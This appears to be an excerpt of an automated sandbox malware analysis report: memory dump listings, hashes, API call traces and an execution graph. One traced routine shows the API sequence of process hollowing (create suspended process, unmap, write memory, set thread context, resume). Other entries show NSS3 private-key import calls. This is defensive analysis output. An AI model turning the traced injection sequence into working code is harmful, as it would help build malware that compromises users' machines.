                                                            • Instruction Fuzzy Hash: DD110C33A051D40FC3168D7C8410565BFE30AA7275F5D539AF4B49B2E2D6278D8B8359
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                            • Instruction ID: 59e2548f491e7600099340ffc40d90b02345ff89fc0fd139df4272503dd40497
                                                            • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                            • Instruction Fuzzy Hash: 0B11C233A491D40EC31A8D3C84005A9BFF30AD3535F198399E4F89B2D2C722C98BC360
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3c6e75e77f2793fa66be3b8d5d79a72f82814c949ef93b88d2ba461be01c1880
                                                            • Instruction ID: 20b21e30a0ec0fb2c99107143c2b9476f8de25489f108ff1004ace05f2c41b4d
                                                            • Opcode Fuzzy Hash: 3c6e75e77f2793fa66be3b8d5d79a72f82814c949ef93b88d2ba461be01c1880
                                                            • Instruction Fuzzy Hash: DB0192F9B0071147E620AF25F8C1727A2A89BC1718F58483EE84457342DB7DEC44C6A9
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 50b9835be22db13bef9f7ab1f5ab60fde322d087d11911c3f840fccf15ba697c
                                                            • Instruction ID: ffed969724d6793407d846275dc0e2c772e288a84eeda5da4526246c819e0252
                                                            • Opcode Fuzzy Hash: 50b9835be22db13bef9f7ab1f5ab60fde322d087d11911c3f840fccf15ba697c
                                                            • Instruction Fuzzy Hash: 630171F57403425BD730AE54C8C8B3FB2A9AF85708F19442CD95957200DFB6E826CA91
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691688506.00000000007BD000.00000040.00000020.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_7bd000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                            • Instruction ID: ddcccf6f637a7a867ce81a0cfd4f1aea3505b685fc5fdf4228cde4255b0c81eb
                                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                            • Instruction Fuzzy Hash: BC117C72340100EFE754EE59DCC1FE673EAEB88320B298065ED04CB356D6BAE801C760
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Object$DeleteSelect
                                                            • String ID: $(ID$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$4ID$@ID$LID$XID$dID$pID$|ID$HD$HD
                                                            • API String ID: 618127014-763545205
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Clipboard$Global$CloseDataInfoOpenWindowWire
                                                            • String ID: @$A$C$F
                                                            • API String ID: 2111159801-319984173
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0215D307
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0215D334
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
                                                            • String ID: K-K/$U5U7$\1B3
                                                            • API String ID: 237503144-1235027928
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0215D307
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0215D334
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
                                                            • String ID: K-K/$U5U7$\1B3
                                                            • API String ID: 237503144-1235027928
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0215DC71
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0215DCA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
                                                            • String ID: eI.K$qs
                                                            • API String ID: 237503144-3936219367
                                                            APIs
                                                            Strings
                                                            • of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in, xrefs: 02149145
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID: of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in
                                                            • API String ID: 621844428-2804141084
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 00413884
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,?,?), ref: 004138B5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
                                                            • String ID: V"
                                                            • API String ID: 237503144-2019076553
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 02153AEB
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,?,?), ref: 02153B1C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
                                                            • String ID: V"
                                                            • API String ID: 237503144-2019076553
                                                            APIs
                                                            • SysStringLen.OLEAUT32 ref: 0042B93C
                                                              • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeapString
                                                            • String ID: /$_
                                                            • API String ID: 983180023-3328996620
                                                            • Opcode ID: 7b73d8b9ad9cc1b35f354d087cce934941f6cc43b019e35cf5136909c666bbea
                                                            • Instruction ID: 6447c4c98e9839bbfe30095b09fd38d16c8898c21f8e458fc47884f27b927c9d
                                                            • Opcode Fuzzy Hash: 7b73d8b9ad9cc1b35f354d087cce934941f6cc43b019e35cf5136909c666bbea
                                                            • Instruction Fuzzy Hash: EBA1D372B097918FC3398A28C8903DFBBD2ABD5320F584A2DD4E9873D1DB359841C786
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: String
                                                            • String ID: /$_
                                                            • API String ID: 2568140703-3328996620
                                                            • Opcode ID: 67fdbd68d30403a612d78c29cb09f4595bf568f7c7babfc7a8b0866fd35ec808
                                                            • Instruction ID: e59c5f7d641e2ae3e5834379c29fb5de7a3f1471c5b7cfdc75f0150d0a2a8145
                                                            • Opcode Fuzzy Hash: 67fdbd68d30403a612d78c29cb09f4595bf568f7c7babfc7a8b0866fd35ec808
                                                            • Instruction Fuzzy Hash: 24A1A172A4D7818FC3298A28C8943EFBBD2ABD5314F194A6CD4E9873D1DB358941C742
                                                            APIs
                                                            • SysStringLen.OLEAUT32 ref: 0042AA1D
                                                              • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeapString
                                                            • String ID: /$_
                                                            • API String ID: 983180023-3328996620
                                                            • Opcode ID: 89d5c1be592629ebb1dc1eb5a24e35478a07929717f2f29c77da904c78c10030
                                                            • Instruction ID: c0f22b295fcd5dfa813694d41399a3aed2f8b54868401d176934dc4335e9d724
                                                            • Opcode Fuzzy Hash: 89d5c1be592629ebb1dc1eb5a24e35478a07929717f2f29c77da904c78c10030
                                                            • Instruction Fuzzy Hash: B291A5327093918FC725CE28C8903DBBBE2ABD5314F594A6DD8E9873D1D6359841CB47
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: String
                                                            • String ID: /$_
                                                            • API String ID: 2568140703-3328996620
                                                            • Opcode ID: e081c47d38b82d7d45e90f16465fe229bee5c6a2502c73ee57cf6a8e50573acb
                                                            • Instruction ID: c90623b6401cffde80f800ac432d1bf549595163c214d07e71d83c03ad1481f2
                                                            • Opcode Fuzzy Hash: e081c47d38b82d7d45e90f16465fe229bee5c6a2502c73ee57cf6a8e50573acb
                                                            • Instruction Fuzzy Hash: C491A5726493818FC339CA28C4547EEBBE2AFD5314F194A6DD4E9973D1DB369801CB42
                                                            APIs
                                                              • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 004222C9
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004222FE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings$AllocateHeap
                                                            • String ID: hi
                                                            • API String ID: 3432729115-3633523372
                                                            • Opcode ID: 2c7b023f8f8e668f3c59ff73d8f09038c84363a572d6bc4f892e354ca4515ac2
                                                            • Instruction ID: 955b234eacedc5ad79a5fbc0d5aeb5eb286d5c951f72c93c1ad7127c08102aad
                                                            • Opcode Fuzzy Hash: 2c7b023f8f8e668f3c59ff73d8f09038c84363a572d6bc4f892e354ca4515ac2
                                                            • Instruction Fuzzy Hash: 3F5187B06083919FE324CF14D8807ABBBE5FBC5704F90892DF9999B280CB749805CB97
                                                            APIs
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 02162530
                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 02162565
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: EnvironmentExpandStrings
                                                            • String ID: hi
                                                            • API String ID: 237503144-3633523372
                                                            • Opcode ID: 29d7f95366c994b5a62b8ac23ea0115722bb9db87849136ec9dd399547f2272f
                                                            • Instruction ID: bf0e15ecb44c72fad2e49ae1c432e2c7174b552740852cee63707956b5c0247b
                                                            • Opcode Fuzzy Hash: 29d7f95366c994b5a62b8ac23ea0115722bb9db87849136ec9dd399547f2272f
                                                            • Instruction Fuzzy Hash: 814146B06483859FE324CF54C894BAFBBE6FFC2740F80492CE9995B290C7748405CB92

                                                            Execution Graph

                                                            Execution Coverage:50.9%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:20.5%
                                                            Total number of Nodes:39
                                                            Total number of Limit Nodes:1
                                                            execution_graph 391 42db010 392 42db049 391->392 400 42db0e1 392->400 401 42d9850 392->401 396 42db115 419 42d9fb0 396->419 398 42db1a7 422 42da4f0 NtAllocateVirtualMemory 398->422 402 42d9875 401->402 403 42d9fb0 VirtualAlloc 402->403 405 42d990f 403->405 404 42d9921 404->396 413 42d9b10 404->413 405->404 406 42d9989 NtCreateFile 405->406 407 42d9a2b 406->407 409 42d9a34 406->409 408 42d9a36 CreateFileMappingA 407->408 407->409 411 42d9a94 MapViewOfFile 408->411 412 42d9a64 408->412 409->404 410 42d9abc FindCloseChangeNotification 409->410 410->404 411->409 412->409 412->411 414 42d9b5e 413->414 415 42d9b77 414->415 416 42d9c2d NtProtectVirtualMemory 414->416 415->396 431 42da150 416->431 420 42d9ff1 419->420 421 42da024 VirtualAlloc 420->421 421->398 423 42da580 422->423 424 42da6f7 GetTempFileNameA 423->424 433 42d9c90 424->433 426 42da71b CreateFileA WriteFile 427 42da780 CreateProcessA NtUnmapViewOfSection VirtualAllocEx WriteProcessMemory 426->427 428 42da82a 427->428 429 42da88e Wow64GetThreadContext Wow64SetThreadContext ResumeThread ExitProcess 428->429 430 42da851 WriteProcessMemory 428->430 429->400 430->428 432 42d9c5c NtProtectVirtualMemory 431->432 432->415 435 42d9c95 433->435 436 42da0d0 437 42d9fb0 VirtualAlloc 436->437 438 42da0dd 437->438

                                                            Callgraph

                                                            Control-flow Graph

                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 042DA561
                                                            • GetTempFileNameA.KERNELBASE(?,kate,00000000,?), ref: 042DA714
                                                            • CreateFileA.KERNELBASE(?,00000003,00000000,00000000,00000004,00000002,00000000), ref: 042DA742
                                                            • WriteFile.KERNELBASE(00000000,?,000D7400,00000000,00000000), ref: 042DA76C
                                                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 042DA7B6
                                                            • NtUnmapViewOfSection.NTDLL(00000000,00400000), ref: 042DA7D0
                                                            • VirtualAllocEx.KERNELBASE(00000000,00400000,?,00003000,00000040), ref: 042DA7FB
                                                            • WriteProcessMemory.KERNELBASE(00000000,00400000,00000000,?,00000000), ref: 042DA81F
                                                            • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 042DA881
                                                            • Wow64GetThreadContext.KERNEL32(?,00010002), ref: 042DA8AF
                                                            • Wow64SetThreadContext.KERNEL32(?,00010002), ref: 042DA8DA
                                                            • ResumeThread.KERNELBASE(?), ref: 042DA8EC
                                                            • ExitProcess.KERNEL32(00000000), ref: 042DA8F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2640862661.00000000042D9000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_42d9000_C9A7.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$FileMemoryThreadWrite$ContextCreateVirtualWow64$AllocAllocateExitNameResumeSectionTempUnmapView
                                                            • String ID: kate
                                                            • API String ID: 1984375786-4076676908
                                                            • Opcode ID: a5fb23d055b49c4060df56bacf9ee3ef03c1422c21c807da1347bc76d1211067
                                                            • Instruction ID: e4f14b68739eca06174bda582b741813046cc1df65037366e0fad947e067c648
                                                            • Opcode Fuzzy Hash: a5fb23d055b49c4060df56bacf9ee3ef03c1422c21c807da1347bc76d1211067
                                                            • Instruction Fuzzy Hash: DDE1E875A10209AFDB54CF84C895FEEB7B5BF88304F108199E908AB391D771AE85CF94

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 042D9FB0: VirtualAlloc.KERNELBASE(00000000,042D990F,00003000,00000040), ref: 042DA034
                                                            • NtCreateFile.NTDLL(00000000,00120089,00000018,?,00000000,00000080,00000001,00000001,00000040,00000000,00000000), ref: 042D9A1B
                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 042D9ACC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2640862661.00000000042D9000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_42d9000_C9A7.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocChangeCloseCreateFileFindNotificationVirtual
                                                            • String ID: @
                                                            • API String ID: 482251274-2766056989
                                                            • Opcode ID: 0e0dc5585c33f2c4c31cdc6bfcf1500614589984357103c7c5ed85e8348694b7
                                                            • Instruction ID: bd96396f4d75e8c93ccaaa446efcccb752ee3ba39a5dc1a14ab55ca33d5e9c81
                                                            • Opcode Fuzzy Hash: 0e0dc5585c33f2c4c31cdc6bfcf1500614589984357103c7c5ed85e8348694b7
                                                            • Instruction Fuzzy Hash: 5F81EE75A10218AFDB24DF54DC55FDAB3B5AF48700F1481E9FA09AB290D7706A84CF94

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 59 42d9b10-42d9b75 call 42d9740 62 42d9b7e-42d9b93 59->62 63 42d9b77-42d9b79 59->63 65 42d9b9c-42d9bb4 62->65 66 42d9b95-42d9b97 62->66 64 42d9c81-42d9c84 63->64 67 42d9bbf-42d9bc9 65->67 66->64 68 42d9bcb-42d9bdb 67->68 69 42d9c17-42d9c1b 67->69 72 42d9bdd-42d9c13 68->72 73 42d9c15 68->73 70 42d9c1d-42d9c21 69->70 71 42d9c29-42d9c2b 69->71 70->71 74 42d9c23-42d9c27 70->74 71->64 72->69 73->67 74->71 76 42d9c2d-42d9c7c NtProtectVirtualMemory call 42da150 NtProtectVirtualMemory 74->76 76->64
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2640862661.00000000042D9000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_42d9000_C9A7.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .tex
                                                            • API String ID: 0-1946526065
                                                            • Opcode ID: 86473fe90031cc0144bf05fc695b61ac0536840d3e25b293d5c37be5d6457d6f
                                                            • Instruction ID: ee9c6706a568a0923de4e5d8cc97e4a373e9782ac261dad96862dd2f9f12c02f
                                                            • Opcode Fuzzy Hash: 86473fe90031cc0144bf05fc695b61ac0536840d3e25b293d5c37be5d6457d6f
                                                            • Instruction Fuzzy Hash: 1751D7B1E10109DFDB04CF84C894BEEFBB5FF48314F148559E915AB280D775AA85CBA0

                                                            Control-flow Graph

                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,042D990F,00003000,00000040), ref: 042DA034
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2640862661.00000000042D9000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_42d9000_C9A7.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID: VirtualAlloc
                                                            • API String ID: 4275171209-164498762
                                                            • Opcode ID: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
                                                            • Instruction ID: 1efe8f597713818d75180bb5a5ffe552834d583dc7332cb4ac17ba556c49bc8b
                                                            • Opcode Fuzzy Hash: c42a450ca02fa363a87eb9b6114333d3fd783ad335b2bc0464273431a807ed53
                                                            • Instruction Fuzzy Hash: 6D1112A0D082C9DEFF01DBE89809BEFBFB55F11708F044098D5446B282D6BA5758C7B6
                                                            APIs
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA67C33
                                                            • NSS_OptionGet.NSS3(0000000C,00000000), ref: 6CA67C66
                                                            • CERT_DestroyCertificate.NSS3(00000000), ref: 6CA67D1E
                                                              • Part of subcall function 6CA67870: SECOID_FindOID_Util.NSS3(?,?,?,6CA691C5), ref: 6CA6788F
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA67D48
                                                            • PR_SetError.NSS3(FFFFE067,00000000), ref: 6CA67D71
                                                            • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CA67DD3
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA67DE1
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA67DF8
                                                            • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CA67E1A
                                                            • PR_SetError.NSS3(FFFFE067,00000000), ref: 6CA67E58
                                                              • Part of subcall function 6CA67870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA691C5), ref: 6CA678BB
                                                              • Part of subcall function 6CA67870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6CA691C5), ref: 6CA678FA
                                                              • Part of subcall function 6CA67870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6CA691C5), ref: 6CA67930
                                                              • Part of subcall function 6CA67870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CA691C5), ref: 6CA67951
                                                              • Part of subcall function 6CA67870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA67964
                                                              • Part of subcall function 6CA67870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CA6797A
                                                              • Part of subcall function 6CA67870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6CA67988
                                                              • Part of subcall function 6CA67870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6CA67998
                                                              • Part of subcall function 6CA67870: free.MOZGLUE(00000000), ref: 6CA679A7
                                                              • Part of subcall function 6CA67870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6CA691C5), ref: 6CA679BB
                                                              • Part of subcall function 6CA67870: PR_GetCurrentThread.NSS3(?,?,?,?,6CA691C5), ref: 6CA679CA
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA67E49
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA67F8C
                                                            • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CA67F98
                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CA67FBF
                                                            • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA67FD9
                                                            • PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6CA68038
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CA68050
                                                            • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CA68093
                                                            • SECOID_FindOID_Util.NSS3 ref: 6CA67F29
                                                              • Part of subcall function 6CA607B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CA08298,?,?,?,6C9FFCE5,?), ref: 6CA607BF
                                                              • Part of subcall function 6CA607B0: PL_HashTableLookup.NSS3(?,?), ref: 6CA607E6
                                                              • Part of subcall function 6CA607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CA6081B
                                                              • Part of subcall function 6CA607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CA60825
                                                            • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CA68072
                                                            • SECOID_FindOID_Util.NSS3 ref: 6CA680F5
                                                              • Part of subcall function 6CA6BC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6CA6800A,00000000,?,00000000,?), ref: 6CA6BC3F
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
                                                            • String ID:
                                                            • API String ID: 2815116071-0
                                                            • Opcode ID: c686dd08f9021d352b45ddc07f65bc1f270f90a4d210efd5afcbcfa3af9df2e1
                                                            • Instruction ID: 8faedaaf691ed9fe1f5afa20ed695678d53e4eb7547fabb2a58b31fa97de48f6
                                                            • Opcode Fuzzy Hash: c686dd08f9021d352b45ddc07f65bc1f270f90a4d210efd5afcbcfa3af9df2e1
                                                            • Instruction Fuzzy Hash: 78E18C706183009FE700CF2AD980B5A77E5AF45708F19492DE99ADBF51E732EC89CB52
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 6C9F1C6B
                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C9F1C75
